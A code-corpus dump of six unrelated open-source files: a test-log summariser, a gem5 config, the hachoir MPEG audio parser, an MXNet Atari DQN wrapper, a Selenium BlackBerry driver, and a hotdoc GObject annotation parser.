CarlosMontilla/FxM | scripts/test/check_tests.py | 1 | 4412 | #!/usr/bin/env python3
"""!
@file
"""
import glob
import sys
import time
# @todo: manage test that have to be checked manually (such as plots)
def analyse_log(filename):
"""!
@brief Analyse a test log to find passed and failed tests
@param filename Name of the log file
@return res @todo doc this
"""
passed_str = "Passed"
failed_str = "Failed"
name_str = "Test unit: "
compiled_str = "Compiled on: "
ran_str = "\t Local "
name = ""
compiled_date = ""
run_date = ""
pass_count = 0
fail_count = 0
log_file = open(filename, 'r')
for line in log_file:
if name_str in line:
name = line[len(name_str):-1]
elif compiled_str in line:
compiled_date = line[len(compiled_str):-1]
elif ran_str in line:
run_date = line[len(ran_str):-1]
elif passed_str in line:
pass_count += 1
elif failed_str in line:
fail_count += 1
if name == "":
name = filename
res = {}
res["name"] = name
res["compiled"] = compiled_date
res["ran"] = run_date
res["pass"] = pass_count
res["fail"] = fail_count
return res
def main(folder, extension, outfile):
"""!
@brief Main function, analyse all the file in a directory with a given
extension and print the results of the passed and failed tests
@param folder Folder to analyse
@param extension File extension to analyse
@param outfile File to save a more extensive description of the tests
@return nothing
"""
fid = open(outfile, 'w+')
print("Test check run on " + time.strftime("%B %d %Y at %H:%M:%S %Z"),
file=fid)
print("", file=fid)
print("|{:^5}|{:^45}|{:^10}|{:^10}|".format("Num", "Test name", "Passed",
"Failed"), file=fid)
print("|{:^5}|{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10), file=fid)
print("|{:^5}|{:^45}|{:^10}|{:^10}|".format("Num", "Test name", "Passed",
"Failed"))
print("|{:^5}|{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10))
total_pass = 0
total_fail = 0
idx = 0
failed_units = []
for filename in glob.iglob(folder + "/*/**/" + "*." + extension,
recursive=True):
idx += 1
res = analyse_log(filename)
total_pass += res["pass"]
total_fail += res["fail"]
print("|{:^5}|{:<45}|{:^10}|{:^10}|".format(idx, res["name"],
res["pass"], res["fail"]), file=fid)
print("|{:^5}|{:<45}|{:^10}|{:^10}|".format(idx, res["name"],
res["pass"], res["fail"]))
print("|{:5}-{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10), file=fid)
print("|{:5} {:<45}|{:^10}|{:^10}|".format("", "Total", total_pass,
total_fail), file=fid)
print("|{:5}-{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10))
print("|{:5} {:<45}|{:^10}|{:^10}|".format("", "Total", total_pass,
total_fail))
print("", file=fid)
print("", file=fid)
total_pass = 0
total_fail = 0
idx = 0
for filename in glob.iglob(folder + "/*/**/" + "*." + extension,
recursive=True):
idx += 1
res = analyse_log(filename)
total_pass += res["pass"]
total_fail += res["fail"]
print("Test N " + str(idx) + ": " + res["name"], file=fid)
print("\t Logfile: " + filename, file=fid)
print("\t Compiled on: ", res["compiled"], file=fid)
print("\t Ran on: ", res["ran"], file=fid)
print("\t Passed tests: " + str(res["pass"]), file=fid)
print("\t Failed tests: " + str(res["fail"]), file=fid)
print("", file=fid)
if res["fail"] > 0:
failed_units.append((idx, res["name"]))
print("", file=fid)
if (len(failed_units) > 0):
print("FAILED UNITS:", file=fid)
for unit in failed_units:
print("\t" + str(unit[0]) + ": " + unit[1], file=fid)
else:
print("ALL TEST PASSED SUCCESSFULLY", file=fid)
fid.close()
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2], sys.argv[3])
| gpl-3.0 |
Weil0ng/gem5 | tests/configs/tsunami-minor.py | 13 | 2346 | # Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
from m5.objects import *
from alpha_generic import *
root = LinuxAlphaFSSystemUniprocessor(mem_mode='timing',
mem_class=DDR3_1600_8x8,
cpu_class=MinorCPU).create_root()
| bsd-3-clause |
duramato/SickRage | lib/hachoir_parser/audio/mpeg_audio.py | 86 | 13752 | """
MPEG audio file parser.
Creation: 12 decembre 2005
Author: Victor Stinner
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet,
MissingField, ParserError, createOrphanField,
Bit, Bits, Enum,
PaddingBits, PaddingBytes,
RawBytes)
from hachoir_parser.audio.id3 import ID3v1, ID3v2
from hachoir_core.endian import BIG_ENDIAN
from hachoir_core.tools import humanFrequency, humanBitSize
from hachoir_core.bits import long2raw
from hachoir_core.error import HACHOIR_ERRORS
from hachoir_core.stream import InputStreamError
# Max MP3 filesize: 200 MB
MAX_FILESIZE = 200*1024*1024*8
class Frame(FieldSet):
VERSION_NAME = { 0: "2.5", 2: "2", 3: "1" }
MPEG_I = 3
MPEG_II = 2
MPEG_II_5 = 0
LAYER_NAME = { 1: "III", 2: "II", 3: "I" }
LAYER_I = 3
LAYER_II = 2
LAYER_III = 1
# Bit rates (bit_rate * 1000 = bits/sec)
# key 15 is always invalid
BIT_RATES = {
1: ( # MPEG1
( 0, 32, 64, 96, 128, 160, 192, 224, 256, 288, 320, 352, 384, 416, 448 ), # layer I
( 0, 32, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 384 ), # layer II
( 0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320 ), # layer III
# - 1 2 3 4 5 6 7 8 9 10 11 12 13 14 -
),
2: ( # MPEG2 / MPEG2.5
( 0, 32, 48, 56, 64, 80, 96, 112, 128, 144, 160, 176, 192, 224, 256 ), # layer I
( 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160 ), # layer II
( 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160 ), # layer III
# - 1 2 3 4 5 6 7 8 9 10 11 12 13 14 -
)
}
SAMPLING_RATES = {
3: {0: 44100, 1: 48000, 2: 32000}, # MPEG1
2: {0: 22050, 1: 24000, 2: 16000}, # MPEG2
0: {0: 11025, 1: 12000, 2: 8000} # MPEG2.5
}
EMPHASIS_NAME = {0: "none", 1: "50/15 ms", 3: "CCIT J.17"}
CHANNEL_MODE_NAME = {
0: "Stereo",
1: "Joint stereo",
2: "Dual channel",
3: "Single channel"
}
# Channel mode => number of channels
NB_CHANNEL = {
0: 2,
1: 2,
2: 2,
3: 1,
}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
if not self._size:
frame_size = self.getFrameSize()
if not frame_size:
raise ParserError("MPEG audio: Invalid frame %s" % self.path)
self._size = min(frame_size * 8, self.parent.size - self.address)
def createFields(self):
# Header
yield PaddingBits(self, "sync", 11, "Synchronize bits (set to 1)", pattern=1)
yield Enum(Bits(self, "version", 2, "MPEG audio version"), self.VERSION_NAME)
yield Enum(Bits(self, "layer", 2, "MPEG audio layer"), self.LAYER_NAME)
yield Bit(self, "crc16", "No CRC16 protection?")
# Rates and padding
yield Bits(self, "bit_rate", 4, "Bit rate")
yield Bits(self, "sampling_rate", 2, "Sampling rate")
yield Bit(self, "use_padding", "Stream field use padding?")
yield Bit(self, "extension", "Extension")
# Channel mode, mode extension, copyright, ...
yield Enum(Bits(self, "channel_mode", 2, "Channel mode"), self.CHANNEL_MODE_NAME)
yield Bits(self, "mode_ext", 2, "Mode extension")
yield Bit(self, "copyright", "Is copyrighted?")
yield Bit(self, "original", "Is original?")
yield Enum(Bits(self, "emphasis", 2, "Emphasis"), self.EMPHASIS_NAME)
size = (self.size - self.current_size) / 8
if size:
yield RawBytes(self, "data", size)
def isValid(self):
return (self["layer"].value != 0
and self["sync"].value == 2047
and self["version"].value != 1
and self["sampling_rate"].value != 3
and self["bit_rate"].value not in (0, 15)
and self["emphasis"].value != 2)
def getSampleRate(self):
"""
Read sampling rate. Returns None on error.
"""
version = self["version"].value
rate = self["sampling_rate"].value
try:
return self.SAMPLING_RATES[version][rate]
except (KeyError, IndexError):
return None
def getBitRate(self):
"""
Read bit rate in bit/sec. Returns None on error.
"""
layer = 3 - self["layer"].value
bit_rate = self["bit_rate"].value
if bit_rate in (0, 15):
return None
if self["version"].value == 3:
dataset = self.BIT_RATES[1] # MPEG1
else:
dataset = self.BIT_RATES[2] # MPEG2 / MPEG2.5
try:
return dataset[layer][bit_rate] * 1000
except (KeyError, IndexError):
return None
def getFrameSize(self):
"""
Read frame size in bytes. Returns None on error.
"""
frame_size = self.getBitRate()
if not frame_size:
return None
sample_rate = self.getSampleRate()
if not sample_rate:
return None
padding = int(self["use_padding"].value)
if self["layer"].value == self.LAYER_III:
if self["version"].value == self.MPEG_I:
return (frame_size * 144) // sample_rate + padding
else:
return (frame_size * 72) // sample_rate + padding
elif self["layer"].value == self.LAYER_II:
return (frame_size * 144) / sample_rate + padding
else: # self.LAYER_I:
frame_size = (frame_size * 12) / sample_rate
return (frame_size + padding) * 4
def getNbChannel(self):
return self.NB_CHANNEL[ self["channel_mode"].value ]
def createDescription(self):
info = ["layer %s" % self["layer"].display]
bit_rate = self.getBitRate()
if bit_rate:
info.append("%s/sec" % humanBitSize(bit_rate))
sampling_rate = self.getSampleRate()
if sampling_rate:
info.append(humanFrequency(sampling_rate))
return "MPEG-%s %s" % (self["version"].display, ", ".join(info))
def findSynchronizeBits(parser, start, max_size):
"""
Find synchronisation bits (11 bits set to 1)
Returns None on error, or number of bytes before the synchronization.
"""
address0 = parser.absolute_address
end = start + max_size
size = 0
while start < end:
# Fast search: search 0xFF (first byte of sync frame field)
length = parser.stream.searchBytesLength("\xff", False, start, end)
if length is None:
return None
size += length
start += length * 8
# Strong validation of frame: create the frame
# and call method isValid()
try:
frame = createOrphanField(parser, start-address0, Frame, "frame")
valid = frame.isValid()
except HACHOIR_ERRORS:
valid = False
if valid:
return size
# Invalid frame: continue
start += 8
size += 1
return None
class Frames(FieldSet):
# Padding bytes allowed before a frame
MAX_PADDING = 256
def synchronize(self):
addr = self.absolute_address
start = addr + self.current_size
end = min(start + self.MAX_PADDING*8, addr + self.size)
padding = findSynchronizeBits(self, start, end)
if padding is None:
raise ParserError("MPEG audio: Unable to find synchronization bits")
if padding:
return PaddingBytes(self, "padding[]", padding, "Padding before synchronization")
else:
return None
def looksConstantBitRate(self, count=10):
"""
Guess if frames are constant bit rate. If it returns False, you can
be sure that frames are variable bit rate. Otherwise, it looks like
constant bit rate (on first count fields).
"""
check_keys = ("version", "layer", "bit_rate")
last_field = None
for index, field in enumerate(self.array("frame")):
if last_field:
for key in check_keys:
if field[key].value != last_field[key].value:
return False
last_field = field
if index == count:
break
return True
def createFields(self):
# Find synchronisation bytes
padding = self.synchronize()
if padding:
yield padding
while self.current_size < self.size:
yield Frame(self, "frame[]")
# padding = self.synchronize()
# if padding:
# yield padding
# Read raw bytes at the end (if any)
size = (self.size - self.current_size) / 8
if size:
yield RawBytes(self, "raw", size)
def createDescription(self):
if self.looksConstantBitRate():
text = "(looks like) Constant bit rate (CBR)"
else:
text = "Variable bit rate (VBR)"
return "Frames: %s" % text
def createMpegAudioMagic():
# ID3v1 magic
magics = [("TAG", 0)]
# ID3v2 magics
for ver_major in ID3v2.VALID_MAJOR_VERSIONS:
magic = "ID3%c\x00" % ver_major
magics.append( (magic,0) )
# MPEG frame magic
# TODO: Use longer magic: 32 bits instead of 16 bits
SYNC_BITS = 2047
for version in Frame.VERSION_NAME.iterkeys():
for layer in Frame.LAYER_NAME.iterkeys():
for crc16 in (0, 1):
magic = (SYNC_BITS << 5) | (version << 3) | (layer << 1) | crc16
magic = long2raw(magic, BIG_ENDIAN, 2)
magics.append( (magic, 0) )
return magics
class MpegAudioFile(Parser):
PARSER_TAGS = {
"id": "mpeg_audio",
"category": "audio",
"file_ext": ("mpa", "mp1", "mp2", "mp3"),
"mime": (u"audio/mpeg",),
"min_size": 4*8,
# "magic": createMpegAudioMagic(),
"description": "MPEG audio version 1, 2, 2.5",
"subfile": "skip",
}
endian = BIG_ENDIAN
def validate(self):
if self[0].name in ("id3v2", "id3v1"):
return True
if not self.stream.checked: # TODO: is it possible to handle piped input?
return False
# Validate first 5 frames
for index in xrange(5):
try:
frame = self["frames/frame[%u]" % index]
except MissingField:
# Require a least one valid frame
if (1 <= index) \
and self["frames"].done:
return True
return "Unable to get frame #%u" % index
except (InputStreamError, ParserError):
return "Unable to create frame #%u" % index
# Check first frame values
if not frame.isValid():
return "Frame #%u is invalid" % index
# Check that all frames are similar
if not index:
frame0 = frame
else:
if frame0["channel_mode"].value != frame["channel_mode"].value:
return "Frame #%u channel mode is different" % index
return True
def createFields(self):
# Read ID3v2 (if any)
if self.stream.readBytes(0, 3) == "ID3":
yield ID3v2(self, "id3v2")
if self._size is None: # TODO: is it possible to handle piped input?
raise NotImplementedError
# Check if file is ending with ID3v1 or not and compute frames size
frames_size = self.size - self.current_size
addr = self.size - 128*8
if 0 <= addr:
has_id3 = (self.stream.readBytes(addr, 3) == "TAG")
if has_id3:
frames_size -= 128*8
else:
has_id3 = False
# Read frames (if any)
if frames_size:
yield Frames(self, "frames", size=frames_size)
# Read ID3v1 (if any)
if has_id3:
yield ID3v1(self, "id3v1")
def createDescription(self):
if "frames" in self:
frame = self["frames/frame[0]"]
return "%s, %s" % (frame.description, frame["channel_mode"].display)
elif "id3v2" in self:
return self["id3v2"].description
elif "id3v1" in self:
return self["id3v1"].description
else:
return "MPEG audio"
def createContentSize(self):
# Get "frames" field
field = self[0]
if field.name != "frames":
try:
field = self[1]
except MissingField:
# File only contains ID3v1 or ID3v2
return field.size
# Error: second field are not the frames"?
if field.name != "frames":
return None
# Go to last frame
frames = field
frame = frames["frame[0]"]
address0 = field.absolute_address
size = address0 + frame.size
while True:
try:
# Parse one MPEG audio frame
frame = createOrphanField(frames, size - address0, Frame, "frame")
# Check frame 32 bits header
if not frame.isValid():
break
except HACHOIR_ERRORS:
break
if MAX_FILESIZE < (size + frame.size):
break
size += frame.size
# ID3v1 at the end?
try:
if self.stream.readBytes(size, 3) == "TAG":
size += ID3v1.static_size
except InputStreamError:
pass
return size
| gpl-3.0 |
xcgoner/dist-mxnet | example/reinforcement-learning/dqn/atari_game.py | 25 | 7148 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
__author__ = 'sxjscience'
import mxnet as mx
import numpy
import cv2
import logging
import os
from utils import *
from replay_memory import ReplayMemory
from game import Game
from game import DEFAULT_MAX_EPISODE_STEP
logger = logging.getLogger(__name__)
_dirname = os.path.dirname(os.path.realpath(__file__))
_default_rom_path = os.path.join(_dirname, "roms", "breakout.bin")
def ale_load_from_rom(rom_path, display_screen):
rng = get_numpy_rng()
try:
from ale_python_interface import ALEInterface
except ImportError as e:
raise ImportError('Unable to import the python package of Arcade Learning Environment. ' \
'ALE may not have been installed correctly. Refer to ' \
'`https://github.com/mgbellemare/Arcade-Learning-Environment` for some' \
'installation guidance')
ale = ALEInterface()
ale.setInt('random_seed', rng.randint(1000))
if display_screen:
import sys
if sys.platform == 'darwin':
import pygame
pygame.init()
ale.setBool('sound', False) # Sound doesn't work on OSX
ale.setBool('display_screen', True)
else:
ale.setBool('display_screen', False)
ale.setFloat('repeat_action_probability', 0)
ale.loadROM(rom_path)
return ale
class AtariGame(Game):
def __init__(self,
rom_path=_default_rom_path,
frame_skip=4, history_length=4,
resize_mode='scale', resized_rows=84, resized_cols=84, crop_offset=8,
display_screen=False, max_null_op=30,
replay_memory_size=1000000,
replay_start_size=100,
death_end_episode=True):
super(AtariGame, self).__init__()
self.rng = get_numpy_rng()
self.ale = ale_load_from_rom(rom_path=rom_path, display_screen=display_screen)
self.start_lives = self.ale.lives()
self.action_set = self.ale.getMinimalActionSet()
self.resize_mode = resize_mode
self.resized_rows = resized_rows
self.resized_cols = resized_cols
self.crop_offset = crop_offset
self.frame_skip = frame_skip
self.history_length = history_length
self.max_null_op = max_null_op
self.death_end_episode = death_end_episode
self.screen_buffer_length = 2
self.screen_buffer = numpy.empty((self.screen_buffer_length,
self.ale.getScreenDims()[1], self.ale.getScreenDims()[0]),
dtype='uint8')
self.replay_memory = ReplayMemory(state_dim=(resized_rows, resized_cols),
history_length=history_length,
memory_size=replay_memory_size,
replay_start_size=replay_start_size)
self.start()
def start(self):
self.ale.reset_game()
null_op_num = self.rng.randint(self.screen_buffer_length,
max(self.max_null_op + 1, self.screen_buffer_length + 1))
for i in range(null_op_num):
self.ale.act(0)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.total_reward = 0
self.episode_reward = 0
self.episode_step = 0
self.max_episode_step = DEFAULT_MAX_EPISODE_STEP
self.start_lives = self.ale.lives()
def force_restart(self):
self.start()
self.replay_memory.clear()
def begin_episode(self, max_episode_step=DEFAULT_MAX_EPISODE_STEP):
"""
Begin an episode of a game instance. We can play the game for a maximum of
`max_episode_step` and after that, we are forced to restart
"""
if self.episode_step > self.max_episode_step or self.ale.game_over():
self.start()
else:
for i in range(self.screen_buffer_length):
self.ale.act(0)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.max_episode_step = max_episode_step
self.start_lives = self.ale.lives()
self.episode_reward = 0
self.episode_step = 0
@property
def episode_terminate(self):
termination_flag = self.ale.game_over() or self.episode_step >= self.max_episode_step
if self.death_end_episode:
return (self.ale.lives() < self.start_lives) or termination_flag
else:
return termination_flag
@property
def state_enabled(self):
return self.replay_memory.size >= self.replay_memory.history_length
def get_observation(self):
image = self.screen_buffer.max(axis=0)
if 'crop' == self.resize_mode:
original_rows, original_cols = image.shape
new_resized_rows = int(round(
float(original_rows) * self.resized_cols / original_cols))
resized = cv2.resize(image, (self.resized_cols, new_resized_rows),
interpolation=cv2.INTER_LINEAR)
crop_y_cutoff = new_resized_rows - self.crop_offset - self.resized_rows
img = resized[crop_y_cutoff:
crop_y_cutoff + self.resized_rows, :]
return img
else:
return cv2.resize(image, (self.resized_cols, self.resized_rows),
interpolation=cv2.INTER_LINEAR)
def play(self, a):
assert not self.episode_terminate,\
"Warning, the episode seems to have terminated. " \
"We need to call either game.begin_episode(max_episode_step) to continue a new " \
"episode or game.start() to force restart."
self.episode_step += 1
reward = 0.0
action = self.action_set[a]
for i in range(self.frame_skip):
reward += self.ale.act(action)
self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.total_reward += reward
self.episode_reward += reward
ob = self.get_observation()
terminate_flag = self.episode_terminate
self.replay_memory.append(ob, a, numpy.clip(reward, -1, 1), terminate_flag)
return reward, terminate_flag
| apache-2.0 |
LukeMurphey/splunk-network-tools | tests/selenium/webdriver/blackberry/webdriver.py | 44 | 4870 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import platform
import subprocess
try:
import http.client as http_client
except ImportError:
import httplib as http_client
from selenium.webdriver.remote.webdriver import WebDriver as RemoteWebDriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support.ui import WebDriverWait
LOAD_TIMEOUT = 5
class WebDriver(RemoteWebDriver):
"""
Controls the BlackBerry Browser and allows you to drive it.
:Args:
- device_password - password for the BlackBerry device or emulator you are
trying to drive
- bb_tools_dir path to the blackberry-deploy executable. If the default
is used it assumes it is in the $PATH
- hostip - the ip for the device you are trying to drive. Falls back to
169.254.0.1 which is the default ip used
- port - the port being used for WebDriver on device. defaults to 1338
- desired_capabilities: Dictionary object with non-browser specific
capabilities only, such as "proxy" or "loggingPref".
Note: To get blackberry-deploy you will need to install the BlackBerry
WebWorks SDK - the default install will put it in the $PATH for you.
Download at https://developer.blackberry.com/html5/downloads/
"""
def __init__(self, device_password, bb_tools_dir=None,
hostip='169.254.0.1', port=1338, desired_capabilities={}):
remote_addr = 'http://{}:{}'.format(hostip, port)
filename = 'blackberry-deploy'
if platform.system() == "Windows":
filename += '.bat'
if bb_tools_dir is not None:
if os.path.isdir(bb_tools_dir):
bb_deploy_location = os.path.join(bb_tools_dir, filename)
if not os.path.isfile(bb_deploy_location):
raise WebDriverException('Invalid blackberry-deploy location: {}'.format(bb_deploy_location))
else:
raise WebDriverException('Invalid blackberry tools location, must be a directory: {}'.format(bb_tools_dir))
else:
bb_deploy_location = filename
"""
Now launch the BlackBerry browser before allowing anything else to run.
"""
try:
launch_args = [bb_deploy_location,
'-launchApp',
str(hostip),
'-package-name', 'sys.browser',
'-package-id', 'gYABgJYFHAzbeFMPCCpYWBtHAm0',
'-password', str(device_password)]
with open(os.devnull, 'w') as fp:
p = subprocess.Popen(launch_args, stdout=fp)
returncode = p.wait()
if returncode == 0:
# wait for the BlackBerry10 browser to load.
is_running_args = [bb_deploy_location,
'-isAppRunning',
str(hostip),
'-package-name', 'sys.browser',
'-package-id', 'gYABgJYFHAzbeFMPCCpYWBtHAm0',
'-password', str(device_password)]
WebDriverWait(None, LOAD_TIMEOUT)\
.until(lambda x: subprocess.check_output(is_running_args)
.find('result::true'),
message='waiting for BlackBerry10 browser to load')
RemoteWebDriver.__init__(self,
command_executor=remote_addr,
desired_capabilities=desired_capabilities)
else:
raise WebDriverException('blackberry-deploy failed to launch browser')
except Exception as e:
raise WebDriverException('Something went wrong launching blackberry-deploy', stacktrace=getattr(e, 'stacktrace', None))
def quit(self):
"""
Closes the browser and shuts down the
"""
try:
RemoteWebDriver.quit(self)
except http_client.BadStatusLine:
pass
| apache-2.0 |
hotdoc/hotdoc | hotdoc/extensions/gi/annotation_parser.py | 1 | 7809 | # -*- coding: utf-8 -*-
#
# Copyright © 2015,2016 Mathieu Duponchelle <[email protected]>
# Copyright © 2015,2016 Collabora Ltd
#
# This library is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
ALLOW_NONE_HELP = \
"NULL is OK, both for passing and returning"
TRANSFER_NONE_HELP = \
"Don't free data after the code is done"
TRANSFER_FULL_HELP = \
"Free data after the code is done"
TRANSFER_FLOATING_HELP = \
"Alias for transfer none, used for objects with floating refs"
TRANSFER_CONTAINER_HELP = \
"Free data container after the code is done"
CLOSURE_HELP = \
"This parameter is a closure for callbacks, many bindings can pass NULL to %s"
CLOSURE_DATA_HELP = \
"This parameter is a closure for callbacks, many bindings can pass NULL here"
DIRECTION_OUT_HELP = \
"Parameter for returning results"
DIRECTION_INOUT_HELP = \
"Parameter for input and for returning results"
DIRECTION_IN_HELP = \
"Parameter for input. Default is transfer none"
ARRAY_HELP = \
"Parameter points to an array of items"
ELEMENT_TYPE_HELP = \
"Generic and defining element of containers and arrays"
SCOPE_ASYNC_HELP = \
"The callback is valid until first called"
SCOPE_CALL_HELP = \
"The callback is valid only during the call to the method"
SCOPE_NOTIFIED_HELP=\
"The callback is valid until the GDestroyNotify argument is called"
NULLABLE_HELP = \
"NULL may be passed to the value"
NOT_NULLABLE_HELP = \
"NULL is *not* OK, either for passing or returning"
DEFAULT_HELP = \
"Default parameter value (for in case the shadows-to function has less parameters)"
DESTROY_HELP = \
"The parameter is a 'destroy_data' for callbacks."
# VERY DIFFERENT FROM THE PREVIOUS ONE BEWARE :P
OPTIONAL_HELP = \
"NULL may be passed instead of a pointer to a location"
# WTF
TYPE_HELP = \
"Override the parsed C type with given type"
class GIAnnotation (object):
def __init__(self, nick, help_text, value=None):
self.nick = nick
self.help_text = help_text
self.value = value
class GIAnnotationParser(object):
def __init__(self):
self.__annotation_factories = \
{"allow-none": self.__make_allow_none_annotation,
"transfer": self.__make_transfer_annotation,
"inout": self.__make_inout_annotation,
"out": self.__make_out_annotation,
"in": self.__make_in_annotation,
"array": self.__make_array_annotation,
"element-type": self.__make_element_type_annotation,
"scope": self.__make_scope_annotation,
"closure": self.__make_closure_annotation,
"nullable": self.__make_nullable_annotation,
"type": self.__make_type_annotation,
"optional": self.__make_optional_annotation,
"default": self.__make_default_annotation,
"destroy": self.__make_destroy_annotation,
}
def __make_type_annotation (self, annotation, value):
if not value:
return None
return GIAnnotation("type", TYPE_HELP, value[0])
def __make_nullable_annotation (self, annotation, value):
return GIAnnotation("nullable", NULLABLE_HELP)
def __make_optional_annotation (self, annotation, value):
return GIAnnotation ("optional", OPTIONAL_HELP)
def __make_allow_none_annotation(self, annotation, value):
return GIAnnotation ("allow-none", ALLOW_NONE_HELP)
def __make_transfer_annotation(self, annotation, value):
if value[0] == "none":
return GIAnnotation ("transfer: none", TRANSFER_NONE_HELP)
elif value[0] == "full":
return GIAnnotation ("transfer: full", TRANSFER_FULL_HELP)
elif value[0] == "floating":
return GIAnnotation ("transfer: floating", TRANSFER_FLOATING_HELP)
elif value[0] == "container":
return GIAnnotation ("transfer: container", TRANSFER_CONTAINER_HELP)
else:
return None
def __make_inout_annotation (self, annotation, value):
return GIAnnotation ("inout", DIRECTION_INOUT_HELP)
def __make_out_annotation (self, annotation, value):
return GIAnnotation ("out", DIRECTION_OUT_HELP)
def __make_in_annotation (self, annotation, value):
return GIAnnotation ("in", DIRECTION_IN_HELP)
def __make_element_type_annotation (self, annotation, value):
annotation_val = None
if type(value) == list:
annotation_val = value[0]
return GIAnnotation ("element-type", ELEMENT_TYPE_HELP, annotation_val)
def __make_array_annotation (self, annotation, value):
annotation_val = None
if type(value) == dict:
annotation_val = ""
for name, val in value.items():
annotation_val += "%s=%s" % (name, val)
return GIAnnotation ("array", ARRAY_HELP, annotation_val)
def __make_scope_annotation (self, annotation, value):
if type (value) != list or not value:
return None
if value[0] == "async":
return GIAnnotation ("scope async", SCOPE_ASYNC_HELP)
elif value[0] == "call":
return GIAnnotation ("scope call", SCOPE_CALL_HELP)
elif value[0] == 'notified':
return GIAnnotation ("scope notified", SCOPE_NOTIFIED_HELP)
return None
def __make_closure_annotation (self, annotation, value):
if type (value) != list or not value:
return GIAnnotation ("closure", CLOSURE_DATA_HELP)
return GIAnnotation ("closure", CLOSURE_HELP % value[0])
def __make_default_annotation (self, annotation, value):
return GIAnnotation ("default %s" % str (value[0]), DEFAULT_HELP)
def __make_destroy_annotation (self, annotation, value):
if value:
return GIAnnotation ("destroy %s" % str (value[0]), DESTROY_HELP)
else:
return GIAnnotation ("destroy", DESTROY_HELP)
def __make_not_nullable_annotation(self):
return GIAnnotation("not nullable", NOT_NULLABLE_HELP)
def __create_annotation (self, annotation_name, annotation_value):
factory = self.__annotation_factories.get(annotation_name)
if not factory:
return None
return factory (annotation_name, annotation_value)
def make_annotations (self, parameter):
if not parameter.comment:
return []
if not parameter.comment.annotations:
return []
annotations = []
for ann, val in parameter.comment.annotations.items():
if ann == "skip":
continue
annotation = self.__create_annotation (ann, val.argument)
if not annotation:
# Special case for silly specification
if (ann == 'not' and len(val.argument) == 1 and
val.argument[0] == 'nullable'):
annotations.append(self.__make_not_nullable_annotation())
else:
print("This parameter annotation is unknown :[" + ann + "]", val.argument)
continue
annotations.append (annotation)
return annotations
| lgpl-2.1 |
